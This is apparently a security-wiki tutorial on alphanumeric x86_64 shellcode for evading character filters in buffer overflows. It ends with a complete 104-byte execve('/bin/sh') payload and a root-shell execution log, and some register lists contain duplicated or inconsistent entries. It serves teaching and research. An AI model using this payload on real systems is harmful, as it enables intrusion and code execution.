Shellcode/Alphanumeric
Alphanumeric shellcode is similar to ascii shellcode in that it is used to bypass character filters and evade intrusion-detection during buffer overflow exploitation. Alphanumeric shellcode can be used to determine a number of factors about the target environment, including the return pointer via a last call technique or the instruction set architecture using a getCPU stub. Available alphanumeric opcodes for the 64-bit x86 architecture limit the use of modifiers to pop, movslq, xor, and imul.
Shellcode/Alphanumeric requires a basic understanding of bitwise math, assembly and shellcode. |
Special thanks to hatter for his contributions to this article.
Contents
Alphanumeric x86_64 register value and data manipulation
Given the limited set of instructions for alphanumeric shellcode, it is important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to mov emulations, which make up most of the actual code.
Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once. Pushing the 64 bit registers RAX-RDI is done using a single upper case P-W (\x50-\x57) dependent on which register is being pushed. Prefixing with "A" (for general registers R8-R15) or "f" for 16 bit registers (AX-DI) gives access to push 32 registers using alphanumeric shellcode. For 16 bit general registers R8B-R15b "f" is prefixed to the corresponding R8-R15 register push.
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode. This is limited to RAX, RCX, and RAX. As with push, the extended register shellcode is prefixed to access 16 bit and general registers. This gives the ability to pop a total of 12 (6 full size and 6 16 bit) registers able to be pop(ed).
For general registers, RAX-RCX are prefixed with "A" for the corresponding R8-R10 pop. The 16 bit registers (using 0x66 or 'f' [sometimes fA] prefix):
Using push and pop the values of 6 fullsize CPU registers can be set:
- %rax
- %rcx
- %rdx
- %r8
- %r9
- %r8
Or get any values of 16 fullsize CPU registers to the top of the stack:
- %r8-%r15
- %rax-%rdi
There are 5 main registers and 5 special 64 bit registers that can be push(ed), but not pop(ed):
- %rbx
- %rsp
- %rbp
- %rsi
- %rdi
This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers by emulating for mov with push and pop. Using only the registers already accessed, an attempt will be made to get instructions to set values.
The special register prefix has been identified:
0x41, 'A'
The word operand override has been identified,
0x66, 'f'.
Note the identification of all the alphanumeric overrides and prefixes. These overrides are very similar to those for 32 bit platforms.
Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions. For example, take this xor instruction. The %rax register can be changed to %rcx or %rdx using the 0x59 Y and 0x5a Z opcodes in place of the 0x58 X opcode.
Whenever there's a controllable register, the notation {reg} is used to recognize it as an option. In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, for example.
The opcodes for %rax, %rcx, and %rdx are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.
Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful. Full control over the %rbx register is not available, however, write access to its sub-registers is available:
- %ebx
- %bx
- %bh
- %bl
Upon further investigation, this opened up access to multiple additional registers using:
- Xor
- Imul
- Movslq
To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?"). If use of the special 64 bit registers is preferred, 0x41 or "A" is placed at the beginning of the bytecode. If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used. When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).
Assembly | Hexadecimal | Alpha |
---|---|---|
imul $0x[byte1],0x[byte2]({reg64}),{reg64} |
\x48\x6b\x??\x#2\x#1 | Hk*21 |
To set the value of %rbx directly, imul, xor, and movslq can be used. It is similar for other registers:
- %rbp
- %rsp
Left over are %rsp, %rbp, %rdi, and %rsi. Taking a closer look at xor, at 0x30 and ending at 0x35 are these valuable xor commands:
- 0x30 is a multi-byte xor instruction. Requiring at least two operands (even if one of them denotes a register).
- 0x31 is as flexible as 0x30.
- 0x32 is just as flexible, although the offsets will change source side rather than destination side.
- 0x33 is the opposite of 0x31 and as flexible.
Combining the knowledge of xor with the knowledge of the stack, when any data is pushed, the data is accessible at %ss:(%rsp). Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:
- %rbx
- %rsp
- %rbp
- %rsi
- %rdi
First, utilise push and pop to simulate 'mov':
<syntaxhighlight lang="asm"> push %rsp; \x54 pop %rcx; \x59 pop %rax; \x5a (This just sets the pointer back) </syntaxhighlight> |
Two XOR parameters allow index registers to be set, %rsi and %rdi. For now, they will be zero'd out:
<syntaxhighlight lang="asm"> push %rsi; \x56 xor %ss:(%rcx), %rsi; \x36\x48\x33\x31 pop %r8; \x41\x58 push %rdi; \x57 xor %ss:(%rcx), %rdi; \x36\x48\x33\x39 pop %r8 </syntaxhighlight> |
Now %rsi and %rdi have been zero'd out. %r14 and %r15 special registers can also be pushed and zeroed out in this fashion. Now "full control" is gained over:
- %rax
- %rcx
- %rdx
- %rsi
- %rdi
- %r8
- %r9
- %r10
- %r14
- %r15
So far, in this sample, full control has not been utilized over:
- %rsp
- %rbp
- %rbx
- %r11
- %r12
- %r13
Similar to push, controllable data is required before the setting of a register. Where pop is concerned, something might be required to be pushed to the stack first, in this case, only the zero register is required. Due to the way that XOR works, once a zero is registered at all, in this case %rax is used as the zero register, it can be used to get %rbx, %rsp, and %rbp to zero if needed:
To get %rbx:
<syntaxhighlight lang="asm"> xor %ss:0x30(%rcx), %rax; store that value in rax xor %rax, %ss:0x30(%rcx); Null that area of stack imul $0x30,%ss:0x30(%rax),%rbx; 0x30 * 0 = 0 imul $0x30,%ss:0x30(%rax),%rbp; 0x30 * 0 = 0 </syntaxhighlight> |
Once the stack space, as well as the destination is set to zero, %rax, %rbp can effectively be mov(ed):
<syntaxhighlight lang="asm"> xor %rax,%ss:0x30(%rcx); 36 48 31 41 30 xor %ss:0x30(%rcx),%rbp; 36 48 33 69 30 </syntaxhighlight> |
The closest thing to incrementing and decrementing is the ability to use the ins and outs instructions to add or subtract 1,2, or 4 against the %rdi register. This still leaves no significant add or sub. Imul can be used with 16 and 8 bit registers to find division. If %rsi or %rdi are not in use, there is also a magic mov :
<syntaxhighlight lang="asm"> movslq %ss:0x30(%rcx), %rsi xor %rsi, %ss:0x30(%rsi) </syntaxhighlight> |
This can come in quite handy when chunking large pieces of data to 0.
Environment
GetCPU
Architecture can only be determined when compatible channels between the target instruction set architectures can be isolated. As long as the instructions perform valid behavior and do not cause access faults on operating systems native to the architecture, it is possible to use a single bytecode sequence in order to determine architecture across a variety of processors. It generally takes a great amount of familiarity and experience with two or more given instruction sets to write shellcode for multiple architectures.
The x86_64 instruction set architecture (also known as x64) does not vastly differ from x86 because of AMD's correcting of Intel's calling convention and architecture.
An alphanumeric instruction compatibility chart can be derived by cross referencing available alphanumeric 64 bit instructions with available printable 32 bit instructions.
Inter-compatibility theory
Specifically non-compatible are the 32 and 64 bit opcodes in the range 0x40-0x4f, as they allow a 32 bit processor to increment or decrement its general-purpose registers, but become prefixes for manipulation of 64 bit registers and 8 additional 64 bit general purpose registers in x64 environments, %r8-%r15.
Since not all opcodes are intercompatible, yet comparisons and conditional jumps are intercompatible, it is possible to determine the architecture of an x86 processor using exclusively alphanumeric opcodes.
By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that will set a value on a different register in the two processors. Following this, a conditional statement can be made against one of the two registers to determine if the value was set.
Using the pop instruction is the most effective way to set the value of a register due to instructional limitations (to keep the code alphanumeric). Using an alternative register to %rsp or %esp as a placeholder for the stack pointer enables the use of an effective conditional statement to determine if the value of a register is equal to the most recent thing pushed or popped from the stack.
Practically Applied: Code
This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns equal on a 32 bit system and not equal on a 64 bit system.
When implementing this bytecode, a conditional jump afterwards may be best reserved for the t and u instructions, jump if equal and jump if not equal, respectively.
- Assembled:
- TX4HPZTAZAYVH92
- Disassembly:
The table here shows opcodes on the left when instructions are equivocal, and opcodes on the right when they differentiate per instruction set.
OpCodes | x86 | x64 |
---|---|---|
54 | push %esp |
push %rsp |
58 | pop %eax |
pop %rax |
34 48 | xor $0x48, %al |
xor $0x48, %al |
50 | push %eax |
push %rax |
5a | pop %edx |
pop %rdx |
54 | push %esp |
push %rsp |
41
5a |
inc %ecx pop %edx |
pop %r10 |
41
59 |
inc %ecx pop %ecx |
pop %r9 |
56 | push %esi |
push %rsi |
48
39 32 |
dec %eax cmp %esi,(%edx) |
cmp %rsi,(%rdx) |
This code executes similarly, but not identically, on both a 32-bit and 64-bit system. The key discrepancy between how the two architectures execute this code is centered around the opcodes "0x41 - 0x4f".
Under a 32-bit architecture, this code pops the value of esp (which was pushed onto the stack previously) into edx and increments ecx. Since the esp register is a pointer to the top of the stack, rdx now contains a pointer to the top of the stack. After this is done, the shellcode continues on to push esi onto the stack - so the value of esi now resides at the top of the stack. When the code executes its final comparison - "cmp %esi, (%edx)" - it is comparing the value of esi to the value that edx points to. As edx points to the top of the stack, and because esi has just been pushed to the top of the stack, the resulting comparison is between the value esi and the value esi. Therefore, equal is returned.
Under a 64-bit architecture this shellcode is not equal . The opcodes "41 5a 41 59" have a different function - instead of popping the value of esp into rdx, it pops it into the 64-bit register %r10 without incrementing %ecx or %rcx, as 0x41 is used as a prefix to indicate the access to the 64-bit architecture. As a result, when the final comparison is made between rsi and the value referenced by rdx, it returns not equal, as rdx does not point to the top of the stack.
On a 64-bit system, this will not cause a segfault because (%rdx) points to somewhere inside the stack.
Last call
XTX4E4UH10H30 |
The steps taken in order to obtain the address to the beginning of the shellcode in only alphanumeric code are a little more complex.
First, to prevent destroying the return pointer (the target data), at least 8 must be added to the stack pointer. This can be done with the use of any conventional pop operation, in this case, pop %rax, which then moves %rsp into %rax through a push / pop mov emulation.
pop %rax push %rsp # move pointer to %rsp into %rax pop %rax |
Because the pop has added 0x8 to %rsp, 0x10 must be substracted from %rax in order to access the return pointer, this is emulated by XORing %al with 0x45 and then 0x55:
xor $0x45,%al # subtract 0x10 from %rax xor $0x55,%al |
This effectively runs a not operation against a single bit. Because of this, the operation is actually + or -, and is not always guaranteed to work its first execution; the problem of which is very easily mitigated through repeated execution (and may not work at times with aslr disabled).
The most recently returned-from return address is then moved into %rsi through the use of an xor mov emulation:
xor %rsi,(%rax) xor (%rax),%rsi # move address to last instruction into %rsi |
Example: Zeroing Out x86_64 CPU Registers
First %rsp is pushed to the top of the stack and the pointer address is popped into in %rcx, the third pop is to ensure that the pointer address matches what is now in %rcx.
<syntaxhighlight lang="asm"> push %rsp pop %rcx pop %r8 </syntaxhighlight> |
The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeros out %rsi by xoring itself, and %rsp is then set back to %rcx using pop.
<syntaxhighlight lang="asm"> push %rsi xor %ss:(%rcx), %rsi pop %r8 </syntaxhighlight> |
Again using the same form, %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is reset to %rcx.
<syntaxhighlight lang="asm"> push %rdi xor %ss:(%rcx), %rdi pop %r8 </syntaxhighlight> |
Zeroing out RDX is much simpler.
<syntaxhighlight lang="asm"> push %rdi pop %rdx </syntaxhighlight> |
The following push and pop sets %rax to 0x30. %al is the lowest order 8 bit subregister of %rax. Since 0x30 resides in %al, the xor effectively zeroes out $rax.
<syntaxhighlight lang="asm"> push $0x30 pop %rax xor $0x30, %al </syntaxhighlight> |
For %rbx and %rbp we xor %ss:0x30(%rcx), which is first zeroed out, against each register and then xor the register against %ss:0x30(%rcx), which results in each register being zeroed out.
Zero out the %ss:0x30(%rcx) stack segment.
<syntaxhighlight lang="asm"> xor %ss:0x30(%rcx), %rax xor %rax, %ss:0x30(%rcx) </syntaxhighlight> |
xor %rbx into the stack segment and then xor it against rbx to zero.
<syntaxhighlight lang="asm"> xor %rbx, %ss:0x30(%rcx) xor %ss:0x30(%rcx), %rbx </syntaxhighlight> |
Rezero the stack segment with %rax.
<syntaxhighlight lang="asm"> push %rdx pop %rax xor %ss:0x30(%rcx), %rax xor %rax, %ss:0x30(%rcx) </syntaxhighlight> |
As before, xor %rbp into the stack segment and then xor it against rbp to zero.
<syntaxhighlight lang="asm"> xor %rbp, %ss:0x30(%rcx) xor %ss:0x30(%rcx), %rbp </syntaxhighlight> |
64 bit shellcode: Conversion to alphanumeric code
- Because of the limited instruction set, the conversion requires many mov emulations via xor, mul, movslq, push, and pop.
Starting shellcode (64-bit execve /bin/sh)
This was converted to shellcode from the example in 64 bit linux assembly |
- execve('/bin/sh');
.section .data .section .text .globl _start _start: # a function is f(%rdi, %rsi, %rdx, %r10, %r8, %r9). # Use zeroed memory to zero out %rsi, %rdi, %rdx xor %rdi, %rdi push %rdi push %rdi pop %rsi pop %rdx # Store '/bin/sh\0' in %rdi movq $0x68732f6e69622f6a, %rdi shr $0x8,%rdi push %rdi push %rsp pop %rdi push $0x3b pop %rax syscall # execve('/bin/sh', null, null) # function no. is 59/0x3b - execve() |
- execve('/bin/sh')
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"
Shellcode Analysis
Immediately before the syscall:
- %rax is set to 0x3b
- %rdi is a pointer to '/bin/sh\0'
- %rsi and %rdx are null
To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code. The xor and imul instructions can then be used to set values on registers.
Writing the syscall
The very first part of the code is used to determine location and write a syscall to the end.
pop %rax push %rsp pop %rax xor $0x65,%al xor $0x75,%al xor %rsi, (%rax) # mov emulated into rsi xor (%rax), %rsi push %rsi pop %rcx pushq $0x3030474a pop %rax xor %eax,0x64(%rcx) |
- This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000. 0x0f05 is the machine code for a syscall.
0x3030474a xor 30304245 -- the "EB00" at the end of the shellcode:
rex.RB rex.X xor %sil,(%rax) |
- The 'EB' in 'EB00' at the end of the shellcode has become 0x050f.
Arguments
Stack Space
- Zero out a qword of data starting at %rcx + 0x30 (48 in decimal)
# Allocate stack space movslq 0x30(%rcx), %rsi xor %esi, 0x30(%rcx) movslq 0x34(%rcx), %rsi xor %esi, 0x34(%rcx) |
Register Initialization
- The %rdx, %rdi, and %rsi registers are used for the execve() syscall. These are zeroed out to initialize their values using the stack space previously allocated.
# Zero rdx, rsi, and rdi movslq 0x30(%rcx), %rdi movslq 0x30(%rcx), %rsi push %rdi pop %rdx |
String Argument
- /bin is placed onto the stack at the space allocated at %rcx + 0x30.
push $0x5a58555a pop %rax xor $0x34313775, %eax xor %eax, 0x30(%rcx) |
- /sh\0 is placed onto the stack at the space allocated at %rcx + 0x34.
push $0x6a51475a pop %rax xor $0x6a393475, %eax xor %eax, 0x34(%rcx) |
- xor is used as a mov emulation to place '/bin/sh\0' into %rdi.
xor 0x30(%rcx), %rdi |
- Set the stack pointer back so %rsp = %rcx + 8 so that the push of %rdi does not overwrite (%rcx). Push '/bin/sh\0'.
pop %rax push %rdi |
Final Registers
- %rsi and %rdx are 0. First, push a byte to meet the sign requirement for movslq, then zero %rdi.
push $0x58 movslq (%rcx), %rdi xor (%rcx), %rdi |
- Align %rsp and %rcx, then use a mov emulation to place %rsp into %rdi. %rdi then contains a pointer to '/bin/sh\0'.
pop %rax push %rsp xor (%rcx), %rdi |
- %rax is set to 59 or 0x3b for the execve() syscall.
xor $0x63, %al |
Final registers:
- %rax = 0x3b
- %rdi = pointer to '/bin/sh\0'
- %rsi = null
- %rdx = null
Payload
- x86_64 alphanumeric execve('/bin/sh',null,null) - 104 bytes ~ Hatter
Successful Execution
During a buffer overflow, this condition is met 100% of the time. |
root ~ # ./loader-64 XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00 # id uid=0(root) gid=0(root) groups=0(root) # uname -p x86_64 # exit root ~ #